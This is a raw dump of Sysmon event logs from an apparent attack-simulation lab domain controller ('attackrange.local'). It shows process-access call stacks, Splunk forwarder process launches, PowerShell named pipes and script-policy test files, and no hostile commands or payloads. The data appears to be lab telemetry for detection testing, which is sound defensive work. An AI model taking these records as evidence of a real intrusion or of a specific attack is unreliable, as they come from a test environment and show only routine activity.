08:01:02.124{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107223Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.124{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107222Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.123{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107221Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.123{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107220Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.123{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B4BE-615A-5602-00000000FC01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107219Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.123{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4BE-615A-5602-00000000FC01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107218Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.123{58E9C193-B4BE-615A-5602-00000000FC01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000107217Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.106{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107216Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.106{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107215Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.106{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107214Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.106{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x8000000000000000107213Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:01:02.075{58E9C193-B4BD-615A-5202-00000000FC01}7260\PSHost.132778080616579956.7260.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x8000000000000000107212Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:01:02.075{58E9C193-B4BD-615A-5402-00000000FC01}7280\PSHost.132778080616877315.7280.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000107211Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.059{58E9C193-B4BD-615A-5202-00000000FC01}7260ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_shvghpay.tt0.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107210Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.044{58E9C193-B4BD-615A-5202-00000000FC01}7260ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4uva4uzu.npc.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107209Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.044{58E9C193-B4BD-615A-5402-00000000FC01}7280ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2yi3lnli.kzq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107208Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.044{58E9C193-B4BD-615A-5402-00000000FC01}7280ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vgvl0wut.ykn.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000107207Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.028{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4uva4uzu.npc.ps12021-10-04 08:01:02.028 11241100x8000000000000000107206Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.005{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vgvl0wut.ykn.ps12021-10-04 08:01:02.005 10341000x8000000000000000107259Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.909{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4BF-615A-5802-00000000FC01}7600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107258Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.909{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107257Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.909{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107256Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.909{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107255Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.909{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107254Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.909{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B4BF-615A-5802-00000000FC01}7600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107253Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.909{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4BF-615A-5802-00000000FC01}7600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107252Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.909{58E9C193-B4BF-615A-5802-00000000FC01}7600C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000107251Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.678{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107250Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.678{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107249Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.678{58E9C193-AE68-615A-C800-00000000FC01}45485880C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CA01-00000000FC01}780C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107248Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.678{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107247Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.678{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107246Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 